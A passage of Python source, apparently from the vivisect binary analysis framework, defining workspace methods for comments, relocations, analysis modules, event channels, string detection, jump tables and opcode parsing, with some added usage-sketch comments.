self.arch = None # The placeholder for the Envi architecture module
self.psize = None # Used so much, optimization is appropriate
cfgpath = os.path.join(self.vivhome, 'viv.json')
self.config = e_config.EnviConfig(filename=cfgpath, defaults=defconfig, docs=docconfig, autosave=autosave)
# Ideally, *none* of these are modified except by _handleFOO funcs...
self.segments = []
self.exports = []
self.imports = []
self.codeblocks = []
self.relocations = []
self._dead_data = []
self.iscode = {}
self.xrefs = []
self.xrefs_by_to = {}
self.xrefs_by_from = {}
# XXX - make config option
self.greedycode = 0
self.metadata = {}
self.comments = {} # Comment by VA.
self.symhints = {}
self.filemeta = {} # Metadata Dicts stored by filename
self.transmeta = {} # Metadata that is *not* saved/evented
self.cfctx = viv_base.VivCodeFlowContext(self)
self.va_by_name = {}
self.name_by_va = {}
self.codeblocks_by_funcva = {}
self.exports_by_va = {}
self.colormaps = {}
self.vasetdefs = {}
self.vasets = {}
self.reloc_by_va = {}
self.func_args = {}
self.funcmeta = {} # Function metadata stored in the workspace
self.frefs = {}
# Extended analysis modules
self.amods = {}
self.amodlist = []
# Extended *function* analysis modules
self.fmods = {}
self.fmodlist = []
self.chan_lookup = {}
self.nextchanid = 1
self._cached_emus = {}
# The function entry signature decision tree
# FIXME add to export
self.sigtree = e_bytesig.SignatureTree()
self.siglist = []
self._initEventHandlers()
# Some core meta types that exist
self.setMeta('NoReturnApis', {})
self.setMeta('SymbolikImportEmulation', None)
# Default to basic file storage
self.setMeta("StorageModule", "vivisect.storage.basicfile")
# There are a few default va sets for use in analysis
self.addVaSet('EntryPoints', (('va', VASET_ADDRESS),))
self.addVaSet('NoReturnCalls', (('va', VASET_ADDRESS),))
self.addVaSet("Emulation Anomalies", (("va", VASET_ADDRESS), ("Message", VASET_STRING)))
self.addVaSet("Bookmarks", (("va", VASET_ADDRESS), ("Bookmark Name", VASET_STRING)))
self.addVaSet('DynamicBranches', (('va', VASET_ADDRESS), ('opcode', VASET_STRING), ('bflags', VASET_INTEGER)))
self.addVaSet('SwitchCases', (('va', VASET_ADDRESS), ('setup_va', VASET_ADDRESS), ('Cases', VASET_INTEGER)))
self.addVaSet('PointersFromFile', (('va', VASET_ADDRESS), ('target', VASET_ADDRESS), ('file', VASET_STRING), ('comment', VASET_STRING), ))
self.addVaSet('CodeFragments', (('va', VASET_ADDRESS), ('calls_from', VASET_COMPLEX)))
self.addVaSet('EmucodeFunctions', (('va', VASET_ADDRESS),))
self.addVaSet('FuncWrappers', (('va', VASET_ADDRESS), ('wrapped_va', VASET_ADDRESS),))
def vprint(self, msg):
logger.info(msg)
def getVivGui(self):
'''
Return a reference to the vivisect GUI object for this workspace. If
the GUI is not running (aka, the workspace is being used programatically)
this routine returns None.
Example:
vwgui = vw.getVivGui()
if vwgui:
vwgui.doStuffAndThings()
'''
return self._viv_gui
def getVivGuid(self):
'''
Return the GUID for this workspace. Every newly created VivWorkspace
should have a unique GUID, for identifying a particular workspace for
a given binary/process-space versus another created at a different
time. Filesystem-copies of the same workspace will have the same GUID
by design. This easily allows for workspace-specific GUI layouts as
well as comparisons of Server-based workspaces to the original file-
based workspace used to store to the server.
'''
vivGuid = self.getMeta('GUID')
if vivGuid is None:
vivGuid = guid()
self.setMeta('GUID', vivGuid)
return vivGuid
def loadWorkspace(self, wsname):
mname = self.getMeta("StorageModule")
mod = self.loadModule(mname)
mod.loadWorkspace(self, wsname)
self.setMeta("StorageName", wsname)
# The event list thusfar came *only* from the load...
self._createSaveMark()
# Snapin our analysis modules
self._snapInAnalysisModules()
def addFref(self, fva, va, idx, val):
"""
Add a reference from the operand at virtual address 'va'
index 'idx' to a function local offset. Positive values
(beginning with 0) are considered argument references. Negative
values are considered function local storage and are relative to
the stack pointer at function entry.
"""
# FIXME this should probably be an argument
r = (va, idx, val)
self._fireEvent(VWE_ADDFREF, r)
def getFref(self, va, idx):
"""
Get back the fref value (or None) for the given operand index
from the instruction at va.
"""
return self.frefs.get((va, idx))
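# Editor's note: minimal usage sketch for the fref API above; fva and opva are hypothetical
# addresses already present in the workspace, and index 0 is the first operand at opva.
#   vw.addFref(fva, opva, 0, 4)   # positive value -> argument reference (per the docstring)
#   vw.addFref(fva, opva, 1, -8)  # negative value -> function-local storage
#   vw.getFref(opva, 0)           # returns the recorded fref (or None if never set)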
def getEmulator(self, logwrite=False, logread=False):
"""
Get an instance of a WorkspaceEmulator for this workspace.
Use logread/logwrite to enable memory access tracking.
"""
plat = self.getMeta('Platform')
arch = self.getMeta('Architecture')
eclass = viv_imp_lookup.workspace_emus.get((plat, arch))
if eclass is None:
eclass = viv_imp_lookup.workspace_emus.get(arch)
if eclass is None:
raise Exception("WorkspaceEmulation not supported on %s yet!" % arch)
emu = eclass(self, logwrite=logwrite, logread=logread)
emu.setEndian(self.getEndian())
return emu
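# Editor's note: sketch of driving the workspace emulator returned above; fva is a
# hypothetical function address that already exists in this workspace.
#   emu = vw.getEmulator(logwrite=True)
#   emu.runFunction(fva, maxhit=1)   # same call pattern isProbablyCode() uses below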
def getCachedEmu(self, emuname):
"""
Get a cached emulator by name. If one doesn't exist it is
created and then cached.
"""
emu = self._cached_emus.get(emuname)
if emu is None:
emu = self.getEmulator()
self._cached_emus[emuname] = emu
return emu
def addLibraryDependancy(self, libname):
"""
Add a *normalized* library name to the import search
chain for this binary. This is only needed for formats
whose imports don't explicitly state their library name.
"""
# FIXME this needs to be event enabled... either plumb it special,
# or allow the get/append/set race...
dl = self.getMeta("DepLibs", None)
if dl is None:
dl = []
dl.append(libname)
self.setMeta("DepLibs", dl)
def getLibraryDependancies(self):
'''
Retrieve the list of *normalized* library dependencies.
'''
dl = self.getMeta("DepLibs", None)
if dl is None:
return []
return list(dl)
def setComment(self, va, comment, check=False):
'''
Set the humon readable comment for a given virtual address.
Comments will be displayed by the code renderer, and
are an important part of this balanced breakfast.
Example:
vw.setComment(callva, "This actually calls FOO...")
'''
if check and self.comments.get(va):
return
self._fireEvent(VWE_COMMENT, (va, comment))
def getComment(self, va):
'''
Returns the comment string (or None) for a given
virtual address.
Example:
cmnt = vw.getComment(va)
print('COMMENT: %s' % cmnt)
'''
return self.comments.get(va)
def getComments(self):
'''
Retrieve all the comments in the viv workspace as
(va, cmnt) tuples.
Example:
for va,cmnt in vw.getComments():
print('Comment at 0x%.8x: %s' % (va, cmnt))
'''
return self.comments.items()
def addRelocation(self, va, rtype, data=None):
"""
Add a relocation entry for tracking.
Expects data to have whatever is necessary for the reloc type. eg. addend
"""
# split "current" va into fname and offset. future relocations will want to base all va's from an image base
mmva, mmsz, mmperm, fname = self.getMemoryMap(va) # FIXME: getFileByVa does not obey file defs
imgbase = self.getFileMeta(fname, 'imagebase')
offset = va - imgbase
self._fireEvent(VWE_ADDRELOC, (fname, offset, rtype, data))
def getRelocations(self):
"""
Get the current list of relocation entries.
"""
return self.relocations
def getRelocation(self, va):
"""
Return the type of relocation at the specified
VA or None if there isn't a relocation entry for
the address.
"""
return self.reloc_by_va.get(va)
def pointerString(self, va):
return self.arch.pointerString(va)
def getAnalysisModuleNames(self):
return list(self.amodlist)
def getFuncAnalysisModuleNames(self):
return list(self.fmodlist)
def addFunctionSignatureBytes(self, bytez, mask=None):
"""
Add a function signature entry by bytes. This is mostly used by
file parsers/loaders to manually tell the workspace about known
entry signature types.
see envi.bytesig for details.
"""
self.sigtree.addSignature(bytez, mask)
self.siglist.append((bytez, mask))
def isFunctionSignature(self, va):
"""
Check if the specified va is a function entry signature
according to the current entry point signature tree...
"""
if not self.isValidPointer(va):
return False
offset, bytes = self.getByteDef(va)
return self.sigtree.isSignature(bytes, offset=offset)
def addNoReturnVa(self, va):
noretva = self.getMeta('NoReturnApisVa', {})
noretva[va] = True
self.cfctx.addNoReturnAddr(va)
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApi(self, funcname):
"""
Inform vivisect code-flow disassembly that any call target
which matches the specified name ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
"""
funcname = funcname.lower()
m = self.getMeta('NoReturnApis', {})
m[funcname] = True
self.setMeta('NoReturnApis', m)
noretva = self.getMeta('NoReturnApisVa', {})
# If we already have an import entry, we need to update codeflow
for lva, lsize, ltype, linfo in self.getImports():
if linfo.lower() != funcname:
continue
self.cfctx.addNoReturnAddr(lva)
noretva[lva] = True
self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApiRegex(self, funcre):
'''
Inform vivisect code-flow disassembly that any call target
which matches the specified regex ("funcname" or "libname.funcname"
for imports) does *not* exit and code-flow should be stopped...
'''
c = re.compile(funcre, re.IGNORECASE)
m = self.getMeta('NoReturnApisRegex', [])
m.append(funcre)
self.setMeta('NoReturnApisRegex', m)
for lva, lsize, ltype, linfo in self.getImports():
if c.match(linfo):
self.addNoReturnApi(linfo)
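# Editor's note: usage sketch for the no-return helpers above; names are matched
# case-insensitively as "funcname" or "libname.funcname" per the docstrings, and the
# specific API names below are only illustrative.
#   vw.addNoReturnApi('kernel32.exitprocess')
#   vw.addNoReturnApiRegex('.*abort$')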
def isNoReturnVa(self, va):
'''
Check if a VA is a no return API
'''
return self.getMeta('NoReturnApisVa', {}).get(va, False)
def checkNoRetApi(self, apiname, va):
'''
Called as new APIs (thunks) are discovered, checks to see
if they wrap a NoReturnApi. Updates if it is a no ret API thunk
'''
noretva = self.getMeta('NoReturnApisVa', {})
for funcre in self.getMeta('NoReturnApisRegex', []):
c = re.compile(funcre, re.IGNORECASE)
if c.match(apiname):
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
for funcname in self.getMeta('NoReturnApis', {}).keys():
if funcname.lower() == apiname.lower():
self.cfctx.addNoReturnAddr(va)
noretva[va] = True
self.setMeta('NoReturnApisVa', noretva)
def addAnalysisModule(self, modname):
"""
Add an analysis module by python import path
"""
if modname in self.amods:
return
mod = self.loadModule(modname)
self.amods[modname] = mod
self.amodlist.append(modname)
logger.debug('Adding Analysis Module: %s', modname)
def delAnalysisModule(self, modname):
"""
Remove an analysis module from the list used during analysis()
"""
if modname not in self.amods:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
x = self.amods.pop(modname, None)
if x is not None:
self.amodlist.remove(modname)
def loadModule(self, modname):
__import__(modname)
return sys.modules[modname]
def addFuncAnalysisModule(self, modname):
"""
Snap in a per-function analysis module (by name) which
will be triggered during the creation of a new function
(makeFunction).
"""
if modname in self.fmods:
return
mod = self.loadModule(modname)
self.fmods[modname] = mod
self.fmodlist.append(modname)
logger.debug('Adding Function Analysis Module: %s', modname)
def delFuncAnalysisModule(self, modname):
'''
Remove a currently registered function analysis module.
Example:
vw.delFuncAnalysisModule('mypkg.mymod')
'''
x = self.fmods.pop(modname, None)
if x is None:
raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
self.fmodlist.remove(modname)
def createEventChannel(self):
chanid = self.chanids.next()
self.chan_lookup[chanid] = Queue.Queue()
return chanid
def importWorkspace(self, wsevents):
"""
Import and initialize data from the given vivisect workspace
export.
"""
# During import, if we have a server, be sure not to notify
# the server about the events he just gave us...
local = False
if self.server is not None:
local = True
# Process the events from the import data...
fe = self._fireEvent
for event, einfo in wsevents:
fe(event, einfo, local=local)
return
def exportWorkspace(self):
'''
Return the (probably big) list of events which define this
workspace.
'''
return self._event_list
def exportWorkspaceChanges(self):
'''
Export the list of events which have been applied to the
workspace since the last save.
'''
return self._event_list[self._event_saved:]
def initWorkspaceClient(self, remotevw):
"""
Initialize this workspace as a workspace
client to the given (potentially cobra remote)
workspace object.
"""
uname = e_config.getusername()
self.server = remotevw
self.rchan = remotevw.createEventChannel()
self.server.vprint('%s connecting...' % uname)
wsevents = self.server.exportWorkspace()
self.importWorkspace(wsevents)
self.server.vprint('%s connection complete!' % uname)
thr = threading.Thread(target=self._clientThread)
thr.setDaemon(True)
thr.start()
def _clientThread(self):
"""
The thread that monitors events on a server to stay
in sync.
"""
if self.server is None:
raise Exception("_clientThread() with no server?!?!")
while self.server is not None:
event, einfo = self.server.waitForEvent(self.rchan)
self._fireEvent(event, einfo, local=True)
def waitForEvent(self, chanid, timeout=None):
"""
Return an event,eventinfo tuple.
"""
q = self.chan_lookup.get(chanid)
if q is None:
raise Exception("Invalid Channel")
return q.get(timeout=timeout)
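# Editor's note: sketch of consuming workspace events through a channel, using only the
# methods defined in this class; this mirrors what _clientThread() does against a server.
#   chanid = vw.createEventChannel()
#   event, einfo = vw.waitForEvent(chanid)
#   vw.deleteEventChannel(chanid)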
def deleteEventChannel(self, chanid):
"""
Remove a previously allocated event channel from
the workspace.
"""
self.chan_lookup.pop(chanid)
def reprPointer(vw, va):
"""
Do your best to create a humon readable name for the
value of this pointer.
note: This differs from the parent function in envi.cli:
* Locations database is checked
* Strings are returned, not named (partially)
* <function> + 0x<offset> is returned if inside a function
* <filename> + 0x<offset> is returned instead of loc_#####
"""
if va == 0:
return "NULL"
loc = vw.getLocation(va)
if loc is not None:
locva, locsz, lt, ltinfo = loc
if lt in (LOC_STRING, LOC_UNI):
return vw.reprVa(locva)
mbase, msize, mperm, mfile = vw.getMemoryMap(va)
ret = mfile + " + 0x%x" % (va - mbase)
sym = vw.getName(va, smart=True)
if sym is not None:
ret = sym
return ret
def reprVa(self, va):
"""
A quick way for scripts to get a string for a given virtual address.
"""
loc = self.getLocation(va)
if loc is not None:
return self.reprLocation(loc)
return "None"
def reprLocation(self, loctup):
if loctup is None:
return 'no loc info'
lva,lsize,ltype,tinfo = loctup
if ltype == LOC_OP:
op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK)
return repr(op)
elif ltype == LOC_STRING:
return repr(self.readMemory(lva, lsize))
elif ltype == LOC_UNI:
#FIXME super ghetto "simple" unicode handling for now
bytes = self.readMemory(lva, lsize)
return "u'%s'" % string.join(bytes.split("\x00"),sep="")
elif ltype == LOC_STRUCT:
lstruct = self.getStructure(lva, tinfo)
return repr(lstruct)
elif ltype == LOC_NUMBER:
value = self.parseNumber(lva, lsize)
hexstr = "0x%%.%dx" % lsize
hexstr = hexstr % value
if lsize == 1:
return "BYTE: %d (%s)" % (value, hexstr)
else:
return "%d BYTES: %d (%s)" % (lsize, value, hexstr)
elif ltype == LOC_IMPORT:
return "IMPORT: %s" % tinfo
elif ltype == LOC_POINTER:
return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO])
else:
n = self.getName(lva)
if n is not None:
return n
return binascii.hexlify(self.readMemory(lva, lsize))
def followPointer(self, va):
"""
Do pointer analysis and follow up the recommendation
by creating locations etc...
"""
ltype = self.analyzePointer(va)
if ltype is None:
return False
# Note, we only implement the types possibly
# returned from analyzePointer...
if ltype == LOC_OP:
# NOTE: currently analyzePointer returns LOC_OP
# based on function entries, lets make a func too...
logger.debug('discovered new function (followPointer(0x%x))', va)
self.makeFunction(va)
return True
elif ltype == LOC_STRING:
self.makeString(va)
return True
elif ltype == LOC_UNI:
self.makeUnicode(va)
return True
return False
def processEntryPoints(self):
'''
Roll through EntryPoints and make them into functions (if not already)
'''
for eva in self.getEntryPoints():
if self.isFunction(eva):
continue
if not self.probeMemory(eva, 1, e_mem.MM_EXEC):
continue
self.makeFunction(eva)
def analyze(self):
"""
Call this to ask any available analysis modules
to do their thing...
"""
self.vprint('Beginning analysis...')
starttime = time.time()
# Now lets engage any analysis modules. If any modules return
# true, they managed to change things and we should run again...
for mname in self.amodlist:
mod = self.amods.get(mname)
self.vprint("Extended Analysis: %s" % mod.__name__)
try:
mod.analyze(self)
except Exception as e:
self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e))
endtime = time.time()
self.vprint('...analysis complete! (%d sec)' % (endtime-starttime))
self.printDiscoveredStats()
self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime))
def analyzeFunction(self, fva):
for fmname in self.fmodlist:
fmod = self.fmods.get(fmname)
try:
fmod.analyzeFunction(self, fva)
except Exception as e:
self.vprint("Function Analysis Exception for 0x%x %s: %s" % (fva, fmod.__name__, e))
self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc())
def getStats(self):
stats = {
'functions': len(self.funcmeta),
'relocations': len(self.relocations),
}
return stats
def printDiscoveredStats(self):
(disc,
undisc,
numXrefs,
numLocs,
numFuncs,
numBlocks,
numOps,
numUnis,
numStrings,
numNumbers,
numPointers,
numVtables) = self.getDiscoveredInfo()
self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (disc*100.0/(disc+undisc), disc, disc+undisc))
self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs))
self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables))
def getDiscoveredInfo(self):
"""
Returns tuple of ( bytes_with_locations, bytes_without_locations ) for all executable maps.
"""
disc = 0
undisc = 0
for mva, msz, mperms, mname in self.getMemoryMaps():
if not self.isExecutable(mva):
continue
off = 0
while off < msz:
loc = self.getLocation(mva+off)
if loc is None:
off += 1
undisc += 1
else:
off += loc[L_SIZE]
disc += loc[L_SIZE]
numXrefs = len(self.getXrefs())
numLocs = len(self.getLocations())
numFuncs = len(self.getFunctions())
numBlocks = len(self.getCodeBlocks())
numOps = len(self.getLocations(LOC_OP))
numUnis = len(self.getLocations(LOC_UNI))
numStrings = len(self.getLocations(LOC_STRING))
numNumbers = len(self.getLocations(LOC_NUMBER))
numPointers = len(self.getLocations(LOC_POINTER))
numVtables = len(self.getLocations(LOC_VFTABLE))
return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables
def getImports(self):
"""
Return a list of imports in location tuple format.
"""
return self.getLocations(LOC_IMPORT)
def makeImport(self, va, libname, impname):
"""
Add an import entry.
"""
if libname != '*':
libname = self.normFileName(libname)
tinfo = "%s.%s" % (libname, impname)
self.makeName(va, "%s_%.8x" % (tinfo, va))
return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo)
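# Editor's note: illustrative call for makeImport() above; the address, library and function
# names are hypothetical. The va gets a "<libname>.<impname>_<va>" name plus a pointer-sized
# LOC_IMPORT location, as implemented above.
#   vw.makeImport(0x401000, 'kernel32', 'CreateFileA')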
def getExports(self):
"""
Return a list of exports in (va,etype,name,filename) tuples.
"""
return list(self.exports)
def addExport(self, va, etype, name, filename, makeuniq=False):
"""
Add an already created export object.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
"""
rname = "%s.%s" % (filename,name)
# check if it exists and is *not* what we're trying to make it
curval = self.vaByName(rname)
if curval is not None and curval != va and not makeuniq:
# if we don't force it to make a uniq name, bail
raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval))
rname = self.makeName(va, rname, makeuniq=makeuniq)
self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename))
def getExport(self, va):
"""
Get a reference to the export object at the given va
(or none).
"""
return self.exports_by_va.get(va)
def findPointers(self, cache=True):
"""
Search through all currently "undefined" space and see
if you can find pointers there... Returns a list of tuples
where the tuple is (<ptr at>,<pts to>).
"""
align = self.arch.archGetPointerAlignment()
if cache:
ret = self.getTransMeta('findPointers')
if ret is not None:
# Filter locations added since last run...
ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)]
self.setTransMeta('findPointers', ret)
return ret
ret = []
size = self.psize
for mva, msize, mperm, mname in self.getMemoryMaps():
offset, bytes = self.getByteDef(mva)
maxsize = len(bytes) - size
# if our memory map is not starting off aligned appropriately
if offset % align:
offset &= -align
offset += align
while offset + size < maxsize:
va = mva + offset
loctup = self.getLocation(va)
if loctup is not None:
offset += loctup[L_SIZE]
if offset % align:
offset += align
offset &= -align
continue
x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
if self.isValidPointer(x):
ret.append((va, x))
offset += size
continue
offset += align
offset &= -align
if cache:
self.setTransMeta('findPointers', ret)
return ret
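# Editor's note: sketch of consuming findPointers(); each result is a (pointer_va, target_va)
# tuple found in currently undefined space, as the docstring above describes.
#   for pva, tva in vw.findPointers(cache=False):
#       vw.followPointer(tva)   # optional follow-up; see followPointer() earlier in this class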
def detectString(self, va):
'''
If the address appears to be the start of a string, then
return the string length in bytes, else return -1.
'''
plen = 0 # pascal string length
dlen = 0 # delphi string length
if self.isReadable(va-4):
plen = self.readMemValue(va - 2, 2) # pascal string length
dlen = self.readMemValue(va - 4, 4) # delphi string length
offset, bytez = self.getByteDef(va)
maxlen = len(bytez) - offset
count = 0
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if count > 0:
loc = self.getLocation(va+count)
if loc is not None:
if loc[L_LTYPE] == LOC_STRING:
if loc[L_VA] == va:
return loc[L_SIZE]
if ord(bytez[offset+count]) != 0:
# we probably hit a case where the string at the lower va is
# technically the start of the full string, but the binary does
# some optimizations and just ref's inside the full string to save
# some space
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c = bytez[offset+count]
# The "strings" algo basically says 4 or more...
if ord(c) == 0 and count >= 4:
return count
elif ord(c) == 0 and (count == dlen or count == plen):
return count
if c not in string.printable:
return -1
count += 1
return -1
def isProbablyString(self, va):
if self.detectString(va) > 0 :
return True
return False
def detectUnicode(self, va):
'''
If the address appears to be the start of a unicode string, then
return the string length in bytes, else return -1.
This will return true if the memory location is likely
*simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>).
'''
# FIXME this does not detect Unicode...
offset, bytes = self.getByteDef(va)
maxlen = len(bytes) - offset
count = 0
if maxlen < 2:
return -1
charset = bytes[offset + 1]
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if (count > 0):
loc = self.getLocation(va+count)
if loc:
if loc[L_LTYPE] == LOC_UNI:
if loc[L_VA] == va:
return loc[L_SIZE]
if ord(bytes[offset+count]) != 0:
# same thing as in the string case, a binary can ref into a string
# only part of the full string.
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c0 = bytes[offset+count]
if offset+count+1 >= len(bytes):
return -1
c1 = bytes[offset+count+1]
# If we find our null terminator after more
# than 4 chars, we're probably a real string
if ord(c0) == 0:
if count > 8:
return count
return -1
# If the first byte char isn't printable, then
# we're probably not a real "simple" ascii string
if c0 not in string.printable:
return -1
# If it's not null,char,null,char then it's
# not simple unicode...
if c1 != charset:
return -1
count += 2
return -1
def isProbablyUnicode(self, va):
if self.detectUnicode(va) > 0 :
return True
return False
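# Editor's note: minimal sketch tying the detectors above together; va is a hypothetical
# address of candidate data, and makeString()/makeUnicode() are the same workspace calls
# used by followPointer() earlier in this class.
#   if vw.isProbablyString(va):
#       vw.makeString(va)
#   elif vw.isProbablyUnicode(va):
#       vw.makeUnicode(va)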
def isProbablyCode(self, va, rerun=False):
"""
Most of the time, absolute pointers which point to code
point to the function entry, so test it for the sig.
"""
if not self.isExecutable(va):
return False
ret = self.isFunctionSignature(va)
if ret:
return ret
if va in self.iscode and not rerun:
return self.iscode[va]
self.iscode[va] = True
emu = self.getEmulator()
emu.setMeta('silent', True)
wat = v_emucode.watcher(self, va)
emu.setEmulationMonitor(wat)
try:
emu.runFunction(va, maxhit=1)
except Exception as e:
self.iscode[va] = False
return False
if wat.looksgood():
self.iscode[va] = True
else:
self.iscode[va] = False
return self.iscode[va]
#################################################################
#
# Opcode API
#
def parseOpcode(self, va, arch=envi.ARCH_DEFAULT):
'''
Parse an opcode from the specified virtual address.
Example: op = m.parseOpcode(0x7c773803)
note: differs from the IMemory interface by checking loclist
'''
off, b = self.getByteDef(va)
if arch == envi.ARCH_DEFAULT:
loctup = self.getLocation(va)
# XXX - in the case where we've set a location on what should be an
# opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param
# so that at least parse opcode wont fail
if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP:
arch = loctup[L_TINFO]
return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False):
if not step:
step = self.psize
fname = self.getMemoryMap(startva)
if fname is None:
return
fname = fname[3]
imgbase = self.getFileMeta(fname, 'imagebase')
iters = 0
ptrbase = startva
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
while self.isValidPointer(rdest) and self.isProbablyCode(rdest):
if self.analyzePointer(ptrbase) in STOP_LOCS:
break
yield rdest
ptrbase += step
if len(self.getXrefsTo(ptrbase)):
break
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
iters += 1
if maxiters is not None and iters >= maxiters:
break
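# Editor's note: sketch of walking a pointer table with the generator above; tableva is a
# hypothetical address of a jump table, and step defaults to the workspace pointer size.
#   for dest in vw.iterJumpTable(tableva, maxiters=64):
#       print(vw.pointerString(dest))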
def moveCodeBlock(self, cbva, newfva):
cb = self.getCodeBlock(cbva)
if cb is None:
return
if cb[CB_FUNCVA] == newfva:
return
self.delCodeBlock(cb)
self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva))
def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4):
'''
So we have the case where if we have two jump tables laid out consecutively in memory (let's
call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to
recognize Foo as being a giant table, with all of Bar overlapping with Foo
So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr
newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from
the list of references that prevRefVa refs to (and delete the name)
We also need to check to see if the functions themselves line up (ie, do these two jump tables
even belong to the same function, or should we remove the code block from the function entirely?)
'''
# Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are
# even in the same function
codeblocks = set()
curfva = self.getFunction(callingVa)
# collect all the entries for the new jump table
for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize):
codeblocks.add(cb)
prevcb = self.getCodeBlock(cb)
if prevcb is None:
continue
# we may also have to break these codeblocks from the old function
# 1 -- new func is none, old func is none
# * can't happen. if the codeblock is defined, we at least have an old function
# 2 -- new func is not none, old func is none
# * Can't happen. see above
# 3 -- new func is none, old func is not none
# * delete the codeblock. we've dropped into a new function that is different from the old;
# since codeflow discovers functions, we should already have all the code blocks for the function
# 4 -- neither are none
# * moveCodeBlock -- that func will handle whether or not functions are the same
if curfva is not None:
self.moveCodeBlock(cb, curfva)
else:
self.delCodeBlock(prevcb[CB_VA])
# now delete those entries from the previous jump table
oldrefs = self.getXrefsFrom(prevRefVa)
todel = [xref for xref in oldrefs if xref[1] in codeblocks]
for va in todel:
self.setComment(va[1], None)
self.delXref(va)
def makeJumpTable(self, op, tova, rebase=False, psize=4):
fname = self.getMemoryMap(tova)[3]
imgbase = self.getFileMeta(fname, 'imagebase')
ptrbase = tova
rdest = self.readMemValue(ptrbase, psize)
if rebase and rdest < imgbase:
rdest += imgbase
# if there's already an Xref to this address from another jump table, we overshot
# the other table, and need to cut that one short, delete its Xrefs starting at this one
# and then let the rest of this function build the new jump table
# This jump table also may not be in the same function as the other jump table, so we need
# to remove those codeblocks (and child codeblocks) from this function
# at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him
# (but skipping over the current jumptable base address we're looking at)
for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest):
if tova == xrfrom:
continue
refva, refsize, reftype, refinfo = self.getLocation(xrfrom)
if reftype != LOC_OP:
continue
# If we've already constructed this opcode location and made the xref to the new codeblock,
# that should mean we've already made the jump table, so there should be no need to split this
# jump table.
if refva == op.va:
continue
refop = self.parseOpcode(refva)
for refbase, refbflags in refop.getBranches():
if refbflags & envi.BR_TABLE:
self.splitJumpTable(op.va, refva, tova, psize=psize)
tabdone = {}
for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)):
if not tabdone.get(rdest):
tabdone[rdest] = True
self.addXref(op.va, rdest, REF_CODE, envi.BR_COND)
if self.getName(rdest) is None:
self.makeName(rdest, "case%d_%.8x" % (i, op.va))
else:
cmnt = self.getComment(rdest)
if cmnt is None:
self.setComment(rdest, "Other Case(s): %d" % i)
else:
cmnt += ", %d" % i
self.setComment(rdest, cmnt)
# This must be second (len(xrefsto))
self.addXref(op.va, tova, REF_PTR)
def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT):
"""
Create a single opcode location. If you have already parsed the
opcode object, you may pass it in.
"""
if op is None:
try:
op = self.parseOpcode(va, arch=arch)
except envi.InvalidInstruction as msg:
# FIXME something is just not right about this...
bytez = self.readMemory(va, 16)
logger.warning("Invalid Instruction Attempt At 0x%x: %s", va, binascii.hexlify(bytez))
raise InvalidLocation(va, msg)
except Exception as msg:
raise InvalidLocation(va, msg)
# Add our opcode location first (op flags become ldata)
loc = self.addLocation(va, op.size, LOC_OP, op.iflags)
# This takes care of all normal indirect immediates
brdone = {}
brlist = op.getBranches()
for tova, bflags in brlist:
# If there were unresolved dynamic branches, oh well...
if tova is None:
continue
if not self.isValidPointer(tova):
continue
brdone[tova] = True
# Special case, if it's a table branch, lets resolve it now.
if bflags & envi.BR_TABLE:
self.makeJumpTable(op, tova)
elif bflags & envi.BR_DEREF:
self.addXref(va, tova, REF_DATA)
ptrdest = None
if self.getLocation(tova) is None:
ptrdest = self.makePointer(tova, follow=False)
# If the actual dest is executable, make a code ref fixup
# which *removes* the deref flag...
if ptrdest and self.probeMemory(ptrdest[0], 1, e_mem.MM_EXEC):
self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF)
else:
self.addXref(va, tova, REF_CODE, bflags)
else:
# vivisect does NOT create REF_CODE entries for
# instruction fall through
